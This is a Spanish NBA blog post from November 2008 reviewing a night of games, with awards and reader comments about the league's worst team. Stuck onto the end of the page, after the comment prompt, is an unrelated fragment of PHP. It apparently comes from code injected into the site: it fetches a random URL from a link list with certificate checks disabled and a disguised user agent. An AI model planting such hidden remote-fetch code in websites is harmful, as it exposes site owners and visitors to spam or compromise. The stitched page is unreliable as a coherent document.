La Crónica (26/11/08)

27 de November de 2008 por TheDeerHunter

Las cartas sobre la mesa. Tras la maratoniana jornada de ayer prácticamente concluye el primer mes de competición y ya nos podemos hacer una idea de quien es quien esta temporada.

Como ya venimos diciendo sorprende la fortaleza del Este y particularmente la de Cleveland. Anoche se permitió el lujo de darle una paliza a (cómo no) Oklahoma jugando Lebron únicamente 17 minutos. 6 jugadores en dobles figuras, todo el mundo aportando… Es otro equipo al que deberíamos tener en cuenta en el debate de mejor banquillo de la liga. Boston a lo suyo, aunque ayer tuvieron que emplearse a fondo contra unos Warriors peleones. El tercero en discordia en la conferencia y sin hacer mucho ruido es Orlando, que sacó adelante un muy difícil partido contra unos Sixers que están decepcionando.

Tras el sólido trío de cabeza, Atlanta y Detroit se adivinan rivales peligrosos. Ambos sacaron adelante dos partidos fáciles contra Milwaukee y New York respectivamente, aunque la sensación es que tienen mucho margen de mejora a poco que recuperen jugadores clave (Josh Smith, McDyess…). Para los últimos asientos de playoff es donde la lucha va a ser más encarnizada si cabe. Los Raptors se deshicieron de los Bobcats sin Jermaine, con un buen Calderón y un sensacional Chris Bosh. Los Nets, en cambio, sufrieron para ganar su primer partido en Sacramento desde el 97 (ya ha llovido) y los Pacers dieron la campanada de la noche frente a Houston, que jugó sin T-Mac pero con Shanne Battier.

En el Oeste los Lakers no jugaron, pero sí lo hicieron el resto de gallos: Los Suns, que se zamparon a los Wolves; los Nuggets, que están como una moto; Utah, que se deshizo sin problemas de los Grizzlies; y los Spurs, que hay que volver a tener en cuenta desde ya mismo y que no tuvieron demasiados problemas con los Bulls. Mención a parte para Portland, que le dio una monumental paliza a Miami con Sergio y Rudy en plan “The Jugones”.

Y, como cada día, las mejores jugadas de la jornada:

CONCLUSIONES

– Los Spurs ya están 8-6, en una racha de tres victorias seguidas, con Ginóbili de vuelta y con el rookie George Hill haciendo olvidar a Parker; los Mavs, pese a las lesiones de Josh Howard, llevan 5 triunfos consecutivos y Nowitzki está a un nivel espectacular; los Hornets y los Suns encadenan tres victorias, y Nuggets, Blazers y Jazz ya han iniciado su encarnizada lucha por la NorthWest. Sí, el Oeste empieza a parecer el Oeste.

Se ha rumoreado que Elton Brand se marchó de Los Angeles por diferencias con Dunleavy. Sabemos, por declaraciones del jugador, que Maggette no soportaba al entrenador de los Clippers. Y en apenas unas semanas de convivencia ya hemos asistido a los primeros roces del técnico con Baron Davis, quien, por muy feliz que esté de haber regresado a su casa, no creo que esté dispuesto a aguantar mucho y menos con su equipo dejando escapar victorias como arena entre los dedos. Si tenéis que elegir entre Dunleavy y Baron Davis ¿con quién os quedariais? Yo lo tengo claro.

– En los Rockets se produjo el regreso de Battier. Como no podía ser de otra manera, McGrady fue baja por lesión. Al menos ahora se coordinan para lesionarse de uno en uno.

– Ya sólo queda un equipo invicto en casa. Son los Cavs, quienes, impulsados por un calendario reciente más bien fácil, están dando miedo. Llevan 3 partidos consecutivos anotando 110 puntos o más y LeBron se permite dosificarse gracias a unos secundarios de nivel.

– Sé que no serviría para nada, pero uno se pregunta qué pasa por la cabeza de Don Nelson en ciertas ocasiones. Con frecuencia, de hecho. Anoche, Anthony Morrow (quien la semana pasada destrozó a los Clippers con 37 puntos) no jugó un solo minuto. No nos consta lesión alguna.

PREMIOS

MVP: Pese a la tentación de dar el galardón a Rondo, por su fabulosa actuación de anoche (22 puntos, 8 rebotes, 7 asistencias sin pérdidas y 2 robos), Chris Bosh nos deja sin alternativa gracias a sus 39 puntos con 15 de 20 en tiros de campo, 9 de 10 en libres, 11 rebotes y 2 tapones. Lástima que en Canadá el Día de Acción de Gracias no se celebre hoy, sino en octubre.

El rookie: Eric Gordon es un anotador compulsivo, y en cuanto le han dado la titularidad lo ha demostrado. Logró 25 puntos el lunes ante los Hornets y anoche se fue a los 24 contra Denver. También merece mención  JJ Hickson: segundo partido consecutivo en el que dispone de minutos y segundo partido consecutivo en el que rinde a buen nivel. Anoche, en la aplastante victoria de los Cavs sobre los Thunder, el novato logró 14 puntos, 6 rebotes y 4 tapones.

La sorpresa: Estamos acostumbrados a que los Pistons fundamenten sus éxitos en su sólido quinteto. Anoche, el mejor rendimiento vino por parte de los suplentes, ya que entre Johnson, Stuckey, Afflalo y Maxiell anotaron 48 puntos con 21 de 31 en tiros. Además, Johnson añadió 13 rebotes y 3 tapones, mientras que Stuckey repartió 11 asistencias.

La decepción: El debut de Zach Randolph con los Clippers no cumplió las mejores expectativas y Z-Bo se quedó en 7 puntos con 3 de 11 en tiros en casi 26 minutos. La peor actuación colectiva vino por parte de los Heat, que recordaron a los del año pasado y fueron ridiculizados en Portland, donde cayeron 68-106.

El mayor esfuerzo en vano: 28 puntos, 17 rebotes y 3 asistencias logró Al Jefferson ante los Suns. Los Wolves plantaron cara pero no pudieron evitar una nueva derrota. Tampoco encontró recompensa Ramon Sessions, que logró 21 puntos, 7 rebotes y 8 asistencias en la derrota de su equipo en Atlanta. Pero si un jugador recordará su partido de anoche con frustración será John Salmons, autor de 38 puntos y 7 rebotes en la derrota de los Knigs, en la prórroga, ante los Nets.

La pregunta: ¿Qué equipo es, Oklahoma City al margen, el peor de la NBA?

Comenta

11 comentarios a esta entrada

  1. Txusma dice:
    #1

    Lo de los entrenadores de la NBA es incomprensible en ocasiones pero el caso de Morrow lo hemos visto ya varias veces. Y el pobre Morrow me da que no llegara ni a participar como pieza medianamente importante durante toda la temporada como si hicieron otros descubrimientos como Moon o Udoka.

      Citar

  2. Noelinho dice:
    #2

    Esto mismo ya pasó hace un par de temporadas y en el mismo equipo. Recordáis el debut de Azubuike? Creo recordar que también debutó con dos partidos de veintitantos puntos, nosecuantos rebotes… una burrada, y a partir de ese debut pues bueno, ha ido jugando más poco que mucho.

    Recordad además, que cuando txus vaticinó lo que ha pasado aún no había entrado en juego la variable Crawford.

      Citar

  3. MagicJohnson32 dice:
    #3

    Lo de Azubuike fue el año pasado, cuando S-Jax no empezó la temporada por la sanción de 7 partidos. El inglés se salió pero fue volver Jackson y pasar a banquillo profundo. Luego, eso sí, ha ido jugando muy bien y se ha ganado un hueco en las rotaciones gracias a la baja de Maggete, la lesión de Monta, etc. Pero vamos, que a Nelson no hay quien lo entienda.

      Citar

  4. Kantonyo dice:
    #4

    Teniendo en cuenta que Clippers mejorará con el fichaje de Randolph y los minutos de Eric Gordon, nos encontramos con que hay varios equipos que pueden disputar a Thunder el premio a la peor franquicia de la liga: Wolves, Bobcats, Kings, Grizzlies y Wizards.

    A Wizards le fatla su mejor jugador Gilbert Arenas, por lo que todavia podemos darle margen de mejora.

    Yo creo que posiblemente el equipo más fácil de ganar en este momento es Memphis Grizzlies, calidad y proyeccion tienen, pero no juegan al baloncesto, pobre Marc ….

      Citar

  5. Txusma dice:
    #5

    Sacramento tiene las bajas ahora mismo de Kevin Martin y Francisco Garcia que quieras q no son importantes y Wizards la de Arenas asi q les daria el beneficio de la duda.
    Yo voto por Bobcats…

      Citar

  6. TheDeerHunter dice:
    #6

    el mío también a los Bobcats… que no se sabe a qué juegan.

    Lo de Morrow me fastidia bastante…

    PD: Kantonio… ¿no va siendo hora que revises tu predicción de los Cavs???

      Citar

  7. Txusma dice:
    #7

    Ademas en Kings, Wolves y Grizzlies ves futuro, pero Bobcats… Va a estar ahi abajo durante bastante tiempo.

      Citar

  8. MagicJohnson32 dice:
    #8

    Los Bobcats se moverán, traspasarán a Richardson o Wallace para obtener margen salarial, porque está claro que así no van a ningún lado. A mí los actuales Knicks me parecen de lo peorcito de la liga, pero es normal con la limpieza que están haciendo. Los Wizards tienen dos All-Stars además de un tercero lesionado, es cuestión de tiempo que salgan del hoyo. Los Warriors, sin Monta, tampoco son para tirar cohetes.

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    ¿propondriaís a Angus Young como entrenador de los Thunder?

      Citar

  10. Jabho dice:
    #10

    Si, diria que los Knicks son los peores tras los trades. Ojo a Grizzlies y Wolves que no arrancan.

    Yo por contra creo que los Bobcats van a ir para arriba. Eso si, yo si fuera ellos haria un trade y conseguiria un interior auqnue tb necesitan anotación exterior así que….

      Citar

  11. Kantonyo dice:
    #11

    Los Cavs estan jugando bastante bien, han perdido solo tres partidos, contra Celtics, Hornets y Pistons. LeBron en este momento es el jugador con más opciones de convertirse en MVP. En estos momentos lo más apropiados es darle como minimo la cuarta plaza del Este. Pero tambien hay que decir que han tenido un calendario fácil, solo han conseguido 3 victorias meritorias, y una de ellas, contra unos Jazz muy perjudicados sin Williams ni Kirilenko.

    Pero estoy contigo, parece que no van a tener problemas los Cavs para meterse en playoffs… aunque todavia es pronto, yo uno de los motivos que daba era que tenian una plantilla envejecida, y eso lo notaran sobre todo más avanzada la temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>